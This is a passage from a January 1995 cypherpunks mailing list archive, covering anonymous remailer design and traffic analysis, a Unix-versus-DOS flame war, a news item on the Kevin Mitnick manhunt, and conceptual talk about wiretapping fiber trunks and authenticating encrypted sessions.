account or dedicated hardware) and a remailer operator (person or group 
providing time & technical skill to install, maintain, and upgrade the 
remailer). Of course the sponsor and operator could be anonymous from each
other, and I suppose even the members of each group need not know each 
others' identities.

c2.org allows anonymous account creation over the net, which is handy.
If you're feeling lucky, you could send cash in the mail instead of a money
order....

IMHO the tricky part is maintaining anonymity of the _operator_ over time. In
a reasonably general model, an operator will need to access a remailer
account across the net repeatedly, to recover from system crashes, install
new versions of remailer software, etc. The nature of a telnet session 
doesn't lend itself to reordering, latency, or cover traffic AFAI can see.
Perhaps the technique of sending encrypted shell scripts to an account for
execution (inquired about here recently) could do the work. Anon-HTTP
combined with WWW forms and some not-so-safe-TCL might offer more palatable
real-time responsiveness. I've experimented a little with a protocol for 
handling complaint mail, in which a cron job (or equivalent) running on the
remailer account greps the received non-remailing mail for complaint keywords,
then encrypts the result and chain-remails it to the operator (or posts it to
some well-propagated newsgroup). 

> Thoughts?  Comments?  Offers to send cute girls?

Please cc: me on the latter.  Thanks. ;}

 -L. Futplex McCarthy, seeking a summer job/internship -- private mail for info



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Thu, 26 Jan 95 23:31:22 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270500.AA00284@carbon.informix.com>
Message-ID: <1995Jan26.232513.4993@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501270500.AA00284@carbon.informix.com> jamesd@com.informix.com () writes:
>I make myself root, and enter my root password.  I type sync
>three times, and then type reboot. And lo, unix reboots.
>
>Eventually, at long, long, long, long, long, last, Unix
>deigns to come back and give me some windows.
>
>bad sucker -- that will teach me -- maybe next time I will type
>six sync commands before rebooting as a sacrifice to the great
>God unix in the vain hope that it will spare my data.

May I ask why you even bother re-booting?  I never re-boot my machine
unless there is a problem.  I can go for MONTHS without re-booting.  I
have never used a DOS/Windows machine that could go more than a few
days without having to be re-booted.

My machine, if gracefully shutdown, boots in about 2 minutes.  DOS, I
think, would take about 30 seconds.  About 25 seconds of both of those
is POST (Power On Self-Test).

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Fri, 27 Jan 95 06:43:06 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270314.AA01417@carbon.informix.com>
Message-ID: <HLGAlG9s1erF075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501270314.AA01417@carbon.informix.com>,
jamesd@informix.com (James Donald) wrote:
> 
> If MIS sets up a decent word processor for the secretaries
> in UNIX or Windows, then the secretaries can do moron work
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> just as easily in either system.  In that sense Perry and
> Bill are perfectly correct.

Ah, yes.  Another knight-on-the-net.  Sorry folks, but I hate it when
the "little people" (other people's view)  are insulted.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Fri, 27 Jan 95 08:54:00 PST
To: perry@imsi.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501271603.AA18804@snark.imsi.com>
Message-ID: <199501271652.IAA15762@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



perry writes:
>james writes:

>   > You can run your program under the debugger and set it so that
>   > when an exception condition occurs, bingo you are in the debugger
>   > at the line where the exception occurred, and all the variables
>   > as they were when the exception occurred, and the rest of windows,
>   > the graphical user interface, has been frozen until you examine 
>   > the situation to your satisfaction.

>   > Try that in Unix.

>   I've been doing it all morning, but then again, I'm just on drugs.

perry! and you didn't share?

josh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Douceur <johndo@microsoft.com>
Date: Fri, 27 Jan 95 09:45:54 PST
To: cypherpunks@toad.com
Subject: RE: Get ready to start breaking rocks for Herr Klinton
Message-ID: <9501271746.AA27857@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: Sandy Sandfort  <sandfort@crl.com>
....

>With his arms control policy background and current familiarity
>with crypto as non-exportable munition, Phil Zimmermann is a
>shoo-in for a seat on the president's Arms Proliferaton Board.
>Hell, he ought to be the Chairperson!

This may have been intended tongue-in-cheek, but I think this is an 
excellent idea.  Think Phil would be interested in the position?  How 
could we get this going?

JD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Fri, 27 Jan 95 00:51:39 PST
To: cypherpunks@toad.com
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <199501270851.AA19809@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 25 Jan 1995 Michael Handler wrote:
>On Wed, 25 Jan 1995 Louis Cypher wrote:
>
>> In recent discussions, the consensus
>> was that message reordering was superior to (and the actual intent of)
>> latency.  Reordering is not sufficient, a form of latency is required
>> to make it effective.
>
>        I have literally hundreds of messages archived from the CP list
of
>several months back where Eric Hughes repeatedly states that reordering,
>not latency, is the key. Reordering of a sufficient magnitude will
>introduce latency inherently. Otherwise you are still vulnerable to
>traffic analysis (which is an art, not a science, remember).
>
>--
>Michael Handler
<grendel@netaxs.com>

If you read my analysis with more care, you will note that I do not argue
that
latency is superior to reordering, nor that it should be used in place of
reordering.  Reordering is far superior to latency. My point is that pure
reordering is vulnerable to attack. It is less vulnerable if combined with
latency.

Also note that this was a repost of a message I sent to the list some
months
ago. I sent it because it seemed similar to the work that Wei Dai has been
posting.


        -Louis Cypher

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLyiy0qyHUAO76TvRAQF6qAQAk6IDl+UknPQ+c6hbmPvlgCtF2xwG0KZ3
aUXiuv/XJ5e5prRwLQ4X6rOUSflT2f+mRPO4fveVmWePWcr8BtV6LUQM+qJOLe5k
Ay7CD+OGN9ni9EhRbIg3Sgdv6yB8cX2CpdMSByFD8J9rM240UWqSt/DgNQIlkTtC
Jx+0NQP80QA=
=aKOE
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 27 Jan 95 10:24:04 PST
To: cypherpunks@toad.com
Subject: Re:  Mixmaster and remailers
Message-ID: <199501271823.KAA19858@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
> Even if you are using a perfect network of remailers, you can still be
> tracked. Only so many messages pass through the network of remailers in any
> given day. If Alice sending a message usualy correlates with Bob receiving
> a message, it is likely that she is sending messages to him. This was
> discussed in some detail in several messages by Hal and Louis Cypher.

Actually I don't think I considered this aspect of the problem.  Probably
you are thinking of Wei Dai's posts along with LC's.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 07:41:42 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270505.AA00287@carbon.informix.com>
Message-ID: <9501271541.AA18730@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com says:
> And did I mention that "make" used to treat a tab as semanticly
> different from a space, so that a tab with an invisible space
> in front of it would result in the makefile failing.
> 
> Oh yes, I did mention that.

Did I mention that DOS used to make you use EDLIN out of the box?

I strongly suspect, James, that you don't understand how to evaluate
an operating system. You make bizarre, insane claims that NT is
somehow more secure than Unix (???), that Unix is somehow harder to
use than DOS, that X is harder to use than Windows (sure, if you
compare the worst Unix editor against the best Windows has I'm sure
you can come up with some vague ammunition. I can play that game too
-- compare FrameMaker against Notepad.)

Luckily, the market has given most of us the best revenge on you,
James -- the Unix world isn't desperately trying to catch up with
MS-DOG.

I'm reminded of a recent instance in which a client and I had to
install an entire trading floor full of Sun workstations -- since we
had decent tools, the task took about two hours, give or take. The PC
ignorami, who make fun of Unix all the time, had a PC on each desk,
too. Their team of about 15 people couldn't finish the task in four days.

But I'm not going to continue this any further. James isn't equipped
to conduct the conversation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 07:43:47 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270512.AA00309@carbon.informix.com>
Message-ID: <9501271543.AA18738@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com says:
> And did I mention that in DOS you can type 
>    rename *.txt *.asc
> to turn all *.txt files into the corresponding *.asc file
> 
> but that if in unix you type
>    mv *.txt *.asc
> not only will it not rename your *.txt files to be *.asc files, but
> if you have only two *.txt files it will silently destroy the
> second and issue no warning that anything has gone amiss.

In Unix, I can use a single command to delete an entire file tree --
rm -r. In DOS, I have to delete each directory by hand.

This isn't how you evaluate these things, James.

> And of course I have already mentioned the unix "make" utility.

DOS doesn't even have a make utility -- perhaps you should do without
using make ever again, as DOS is obviously superior.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 08:03:27 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270629.AA00372@carbon.informix.com>
Message-ID: <9501271603.AA18804@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com says:
> And another vast advantage of DOS Windows is that it is 
> a vastly better environment for developing software than unix.
> 
> The great strength is of course symbolic debugging -- you can
> single step your compiled code, and see it displayed symbolicly,
> with the symbols and statements of your source code, whilst
> unix programmers are usually reduced to picking through core 
> dumps like grave robbers.

Strange -- I've had symbolic debuggers and execution environments on
Unix since I started using it in the early 1980s. I guess I've just
been hallucinating. Or perhaps James is.

> You can run your program under the debugger and set it so that
> when an exception condition occurs, bingo you are in the debugger
> at the line where the exception occurred, and all the variables
> as they were when the exception occurred, and the rest of windows,
> the graphical user interface, has been frozen until you examine 
> the situation to your satisfaction.
> 
> Try that in Unix.

I've been doing it all morning, but then again, I'm just on drugs.

> You might be able to do a crude and limited equivalent with 
> a text mode program, but with a GUI program you are hosed.

Actually, I've been doing it on a large GUI application.

> This is the basic reason why unix software sucks -- because the
> tools for writing it suck.

Fascinating.

> And windows has the *.rc file system for internationalization.

I guess that the Posix internationalization system is another
hallucination of mine.

James, you are an ignoramous.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 27 Jan 95 09:18:58 PST
To: cypherpunks@toad.com
Subject: Re: "Subway" remailers
Message-ID: <9501271718.AA10027@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


maher@kauai.UCSD.EDU (Kevin E. Maher) writes:
>        I think what you've described is essentially a "secondary"
>remailer, one which only communicates with other remailers in messages
>of a fixed size.  I'm pretty sure mixmaster can do this, and additionaly
>can split a message into chunks and send them on their way via differen
>paths.
>
>        If I've misinterpreted what you were describing, please correctme.

Hmmm...  think of an egg carton, filled with anywhere between zero and
twelve eggs. Each egg has its own itinerary as to how many stops it
wants to make at other remailers, and whether it wants to change
cartons. The eggs would be entire messages, and could "get off" at
any particular stop, or at a random stop (based on # of rides(hops?)).
The entire carton would be encrypted from one stop to the next.

I would anticipate that the single-message architecture of the cpunk
remailer would be retained, and that "riding the subway" would be an
optional feature. Of course with "passenger" exchange and waiting
you essentially get the mixmaster effect, except you are blind to
the actual pathway. (remember the MX-missle system, which planned on
moving ICBMs from launch site to launch site in an underground matrix
of tunnels?) The only thing you would see from the outside is regular
pulses of large cargo-carrying (or not) message containers. It might
be a partial cover-traffic solution as well, though you still have to
worry about entering and exiting the subway system, it's just that it
somewhat breaks the identifiable direct traffic-trace links.

An even more advanced feature could allow an individual to submit
an entire container (loaded with different messages) to the subway
system (although this may give an attacker clues about any weakness
in randomizing pathways internal to the system, for users utilizing
default features). Imagine only submitting one or two messages a
day that delivered twenty-five. That might really furrow a traffic
analyst's brow. More or less that extends the subway paradigm
outside the ring of the system, at least partially, I would guess.

I am unsure if there is an existing term for this, but how about
"composite mail" containing "aggregate messages"?

------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Fri, 27 Jan 95 11:40:33 PST
To: cypherpunks@toad.com
Subject: Wall Street Journal Article
Message-ID: <199501271939.LAA14460@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This may have been mentioned, if so please ignore.  

There was an interesting article in Thursday's Wall Street 
Journal calling for the end of anonymous communications on the Internet.
It is on page B1 under the "Personal Technology" column and was written 
by Walter Mossberg (mossberg@wsj.com) who invites comment.  

Just a couple of quotes: 

"When forums operate under the cloak of anonymity, it's no differenct 
from printing a newpaper in which the bylines are admittedly fake, and 
the letters to the editor are untraceable." 

and 

"It <anonymous communications> makes it easier to spread wild conspiracy 
theories, smear people, conduct financial scams or victimize others 
sexually."

He goes on to discuss the other two BIG problems on the Internet, those 
being "Incivility" (flaming for breach of netiquette) and "Censorship" 
(cancelling of spams).


Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 27 Jan 95 09:54:01 PST
To: cypherpunks@toad.com
Subject: Re: "Subway" remailers
Message-ID: <9501271753.AA10408@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 maher@kauai.UCSD.EDU (Kevin E. Maher) writes:
>        I think what you've described is essentially a "secondary"
>remailer, one which only communicates with other remailers in messages
>of a fixed size.  I'm pretty sure mixmaster can do this, and additionaly
>can split a message into chunks and send them on their way via differen
>paths.
>
>        If I've misinterpreted what you were describing, please correctme.

Hmmm...  think of an egg carton, filled with anywhere between zero and
twelve eggs. Each egg has its own itinerary as to how many stops it
wants to make at other remailers, and whether it wants to change
cartons. The eggs would be entire messages, and could "get off" at
any particular stop, or at a random stop (based on # of rides(hops?)).
The entire carton would be encrypted from one stop to the next.

I would anticipate that the single-message architecture of the cpunk
remailer would be retained, and that "riding the subway" would be an
optional feature. Of course with "passenger" exchange and waiting
you essentially get the mixmaster effect, except you are blind to
the actual pathway. (remember the MX-missle system, which planned on
moving ICBMs from launch site to launch site in an underground matrix
of tunnels?) The only thing you would see from the outside is regular
pulses of large cargo-carrying (or not) message containers. It might
be a partial cover-traffic solution as well, though you still have to
worry about entering and exiting the subway system, it's just that it
somewhat breaks the identifiable direct traffic-trace links.

An even more advanced feature could allow an individual to submit
an entire container (loaded with different messages) to the subway
system (although this may give an attacker clues about any weakness
in randomizing pathways internal to the system, for users utilizing
default features). Imagine only submitting one or two messages a
day that delivered twenty-five. That might really furrow a traffic
analyst's brow. More or less that extends the subway paradigm
outside the ring of the system, at least partially, I would guess.

I am unsure if there is an existing term for this, but how about
"composite mail" containing "aggregate messages"?

------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Jan 95 10:24:39 PST
To: cypherpunks@toad.com
Subject: RE: Get ready to start breaking rocks for Herr Klinton
Message-ID: <199501271824.NAA04461@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 95 John Douceur <johndo@microsoft.com> said: 
 
 
>This may have been intended tongue-in-cheek, but I think this is an  
>excellent idea.  Think Phil would be interested in the position?  How  
>could we get this going? 
 
 
 
One well-travelled path to success is through the Foreign Policy
Association, and being published in the journal "Foreign Affairs".  Many of
the wonks climbed this greasy pole -- Kissinger et al. 
 
 
Thus, an article on cryptography, PGP and its beneficial use for -- or
threat to -- foreign policy and arms control might be sent to the
publisher: 
 
 
     James Hoge, Editor 
     Foreign Affairs 
     58 East 68th Street 
     New York, NY 10021 
     (212) 734-0400 
 
 
The Foreign Policy Association runs seminars, junkets, fellowships,
retreats, advances, and cartels for aspiring and decrepit world leaders and
public opinion spew-gushers.  So perhaps there might be receptivity to a
seminar on PGP and public crypto for the high-domed dim-bulbs. 
 
 
     Foreign Policy Association 
     729 7th Avenue, 8th Floor 
     New York, NY 10019 
     (212) 764-4050 
 
 
Then, there's the Carnegie stable of world meddlers which sponsors fledging
and sinewy American eagles and vultures: 
 
 
     Carnegie Council on Ethics and International Affairs, 170 East 64th
St, NY, NY 10021. 
 
     Carnegie Leadership Program, 170 East 64th St, NY, NY 10021 
 
     Carnegie Commission on Science, Technology & Government, 437 Madison,
NY, NY 10021. 
 
     Carnegie Foundation, 437 Madison Avenue, NY, NY 10021 (the main honey
pot). 
 
     Carnegie Foundation for World Something in DC. 
 
 
These and a cackling aviary in VA black-farms are the roosts of the big
arms poachers and clip-wingers. 
 
 
Golly, must dear tender Phil hang with these peckerwoods? 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Fri, 27 Jan 95 06:36:02 PST
To: cypherpunks@toad.com
Subject: hacker search
Message-ID: <9501271329.AA26776@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



US Marshals On Trail Of Hacker
WASHINGTON, D.C., U.S.A., 1995 JAN 26 (NB) -- The US Marshals Service is on
the trail of a computer hacker who disappeared after being convicted of one
electronic crime and charged with another.

Authorities say they are trying to locate Kevin David Mitnick, 31, originally
from Sepulveda, California.

Deputy US Marshal Kathleen Cunningham told Newsbytes the Marshals Service has
had a probation violation warrant for Mitnick since November 1992, and almost
caught up with him in Seattle last October.

Cunningham said Mitnick is a ham radio enthusiast and is believed to use a
scanner to keep track of police in the area where he is hiding. "(Local
police) didn't use radio security so as soon as his address was mentioned he
was out of there. He just left everything."

Cunningham said authorities were able to get quite a bit of information about
Mitnick from the things he abandoned when he fled the Seattle location.

Mitnick is considered an expert at gaining control of computers to monitor or
use communications systems and knows how to manufacture false identities
using computers.

While still a teenager Mitnick was charged with "cracking" the North American
Air Defense Command computer and of using a modem to control telephone
switching centers in New York and California. A story last summer in The New
York Times reported Mitnick listened in on phone calls and reprogrammed the
home telephone of one individual so that each time the phone was picked up a
recording asked the phone user to deposit 25 cents.

Mitnick was charged with electronically stealing $1 million in secure
software from Digital Equipment Corp. causing the company to spend $160,000
to close up the gaps in its computer security. Upon conviction in that case
Mitnick was placed on supervisory probation in 1992. He disappeared later
that year after he was charged with illegally cracking into Pacific Bell's
computers. He is also reportedly a suspect in an incident in which someone
illegally accessed the computer at Britain's Loughborough University.

An information sheet about Mitnick says that, although he is not considered a
dangerous criminal, his activities are costing millions of dollars in the
public and private sectors. "Sensitive information illegally accessed by
Mitnick would cause continued financial hardship to these various
corporations if the information is ever disseminated to others."

The document warns authorities who might come in contact with Mitnick to be
very cautious and letting him get his hands on any personal information about
officers. "He possesses an amazing ability to disrupt one's personal life
through his computer knowledge, i.e., TRW's (credit ratings), phone service,
etc." warns the US Marshal's Service.

When contacted by Newsbytes, spokesperson Dave Fletcher at the Federal Bureau
of Investigation Press Office in Washington DC said the FBI does not hold a
warrant for Mitnick's arrest.

The fugitive warrant held by the US Marshal's Service describes Mitnick as
being a Caucasian, 5 feet 11 inches tall with a fair complexion, blue eyes,
brown hair, and wearing glasses.

(Jim Mallory/19950126/Press contact: US Marshal's Service, 202-307-9000)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 27 Jan 95 13:34:39 PST
To: joshua geller <joshua@alkahest.retix.com>
Subject: I Apologise for explosive vomiting.
In-Reply-To: <199501270601.WAA02306@alkahest.isas.com>
Message-ID: <Pine.3.89.9501271305.A21879-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



Sorry:  I got flamed for laughing at Perry's rather silly statement
that unix is as easy as DOS.

They asked me to produce evidence.

Since I was working on my unix Sun Sparc Station 20 at the 
time  (with extreme reluctance), and I had just used
what unix folk humorously call their command line editor, 
so I suffered from explosive vomiting, and vomited all over 
the cypherpunks mailing list.

After the first bout of explosive vomit, I returned to work, whereupon
the unix "High Performance" files system lost one of my files,
producing the second round of explosive vomit.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 27 Jan 95 10:37:10 PST
To: weidai@eskimo.com
Subject: Re: Traffic monitoring (Was: Reordering, not Latency)
In-Reply-To: <199501270816.AA23846@mail.eskimo.com>
Message-ID: <199501271836.NAA23216@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> How would you get access to the trunks?  Aren't they mostly optic 
> fibers now?  Also, since Internet traffic is growing at a geometric 
> rate, the probability of anyone or any organization having the 

I can't speak to the current system per se, but slowly things are
moving to SONET. A key feature of SONET is that indivual channel
like DS-0, OR DS-1 CAN BE BROKEN out without "de muxing" the 
entire data stream.

Basically they have in the "system" a pointer to the memory location
of each channel and they can just full that frame out.

This is important for a reason I have spoken here before about..

Law Enforcement loves to talk about how digtial tech will make things
harder to "tap." When in fact technology like SONET will make it
easier. (today to tap into a DS-3 trunk, looking for a DS-0 channel,
you need to de-mux and pull out all the DS-1 channels, find the DS-1
that contains the DS-0 you want, and then de-mux that to get into and
Tap the DS-0.)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 27 Jan 95 13:41:29 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501271543.AA18738@snark.imsi.com>
Message-ID: <Pine.3.89.9501271325.A23224-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, Perry E. Metzger wrote:
> In Unix, I can use a single command to delete an entire file tree --
> rm -r. In DOS, I have to delete each directory by hand.

Use the command deltree /y.  Or any of the cool third party
utilities, or the windows file manager which offers a true
hierarchical view unlike the hierarchical view offered by
the sun OS file manager.

> DOS doesn't even have a make utility -- perhaps you should do without
> using make ever again, as DOS is obviously superior.

I wonder how I have been compiling my files all these years.

I use make and nmake to do any non procedural task in DOS that
involves file dates and file existence, not just to compile files.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 27 Jan 95 10:50:35 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CERT statement
In-Reply-To: <9501270006.AA17831@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950127134421.22225A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995, Perry E. Metzger wrote:

> Kerberos per se isn't sufficient to defend against session hijacking
> attacks, you know. The situation in question is really insidious and
> requires packet-by-packet cryptographic authentication.

Do you really need to authenticate every packet?  Isn't it enough to 
authenticate the party and perform a secure key exchange, then depend on 
the encryption (+ message authentication code for block ciphers) ?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 10:53:30 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950127134421.22225A-100000@thrash.src.umd.edu>
Message-ID: <9501271852.AA19504@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> 
> > Kerberos per se isn't sufficient to defend against session hijacking
> > attacks, you know. The situation in question is really insidious and
> > requires packet-by-packet cryptographic authentication.
> 
> Do you really need to authenticate every packet?  Isn't it enough to 
> authenticate the party and perform a secure key exchange, then depend on 
> the encryption (+ message authentication code for block ciphers) ?

If things are merely encrypted, an attacker can garble them without
being caught -- I can "decrypt" random numbers into other random
numbers if I want.  Think of an attacker trying to sabotage the
transfer of a binary file and you'll see why you need authentication.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Fri, 27 Jan 95 05:57:01 PST
To: cypherpunks@toad.com
Subject: re: Wei Dei: monitoring
Message-ID: <199501271356.NAA12303@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


>How would you get access to the trunks?

Not that difficult for an intelligence agency.

>Aren't they mostly optic fibers now?

Can be tapped.

>Also, since Internet traffic is growing at a geometric
rate, the probability of anyone or any organization having the
capacity to monitor and process ALL of Internet traffic should be
very small and decreasing.

That's what super-computers are for (besides chaos modelling).


-rkm


---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 27 Jan 95 11:09:38 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CERT statement
In-Reply-To: <9501271852.AA19504@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950127140107.22225C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, Perry E. Metzger wrote:

> If things are merely encrypted, an attacker can garble them without
> being caught -- I can "decrypt" random numbers into other random
> numbers if I want.  Think of an attacker trying to sabotage the
> transfer of a binary file and you'll see why you need authentication.

You certainly need some kind of encrypted secure checksum (MAC) to ensure 
message integrity.  I don't think you have to go through the 
entire authentication of the principal.  (Though as V. Gligor keeps 
showing, even if you have a MAC at the end of your data, there are still 
some kinds of integrity attacks which are possible if you are not careful 
about how MACs and encryption is used).

Now if you are talking about simple denial-of-service (detected tampering
or traffic flooding), that is another more difficult story. 

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 11:32:12 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950127140107.22225C-100000@thrash.src.umd.edu>
Message-ID: <9501271931.AA19578@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> You certainly need some kind of encrypted secure checksum (MAC) to ensure 
> message integrity.  I don't think you have to go through the 
> entire authentication of the principal.

The techniques being talked about use keyed MD5, which the equivalent.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.sinet.org (Anonymous)
Date: Fri, 27 Jan 95 11:55:10 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <1P8AlKJXYHxT078yn@ssnet.com>
Message-ID: <m0rXwmn-000vFYC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Again in the vein of simple to implement...you could set up several
> ghost machines that don't really exist but look as if they where
> connected to the IP machine through uucp.  I'm not really sure what
> the From: address would look like, but it should be easy to generate.
> 
> If this was workable, you could create x ghost machines and
> randomly pick a From: for each message.  True, the Inet box would
> be ID'ed, but as a transmission agent, not an originator.

Forwarded Message:


Received: by alpha.c2.org for me@alpha.c2.org
 From nobody@flame.sinet.org  Fri Jan 27 11:42:38 1995
Received: from myriad.pc.cc.cmu.edu (MYRIAD.PC.CC.CMU.EDU [128.2.93.177]) by infinity.c2.org (8.6.9/8.6.9) with SMTP id LAA24850 for <me@alpha.c2.org>; Fri, 27 Jan 1995 11:42:38 -0800
Received: from flame.sinet.org by myriad.pc.cc.cmu.edu 
                (Linux Smail3.1.28.1 #12)  
        id m0rXwcA-000vFYC; Fri, 27 Jan 95 14:45 EST
Message-Id: <m0rXwcA-000vFYC@myriad.pc.cc.cmu.edu>
Date: Fri, 27 Jan 95 14:45 EST
Subject: test
To: me@alpha.c2.org
From: nobody@flame.sinet.org (Anonymous)
Comments: This message did not originate from the above address.  It was automatically remailed by an anonymous mail service.  Please report inappropriate use to <complaints@flame.sinet.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 27 Jan 95 17:53:09 PST
To: cypherpunks@toad.com
Subject: Re:  CIAC Bulletin F-09
Message-ID: <9501272302.AA23522@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain



Sigh.  After all these years, people are still using mail systems which
run /bin/mail setuid-root instead of setgid-mail.....

Once in a while it's nice to be using System V.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Jan 95 12:18:10 PST
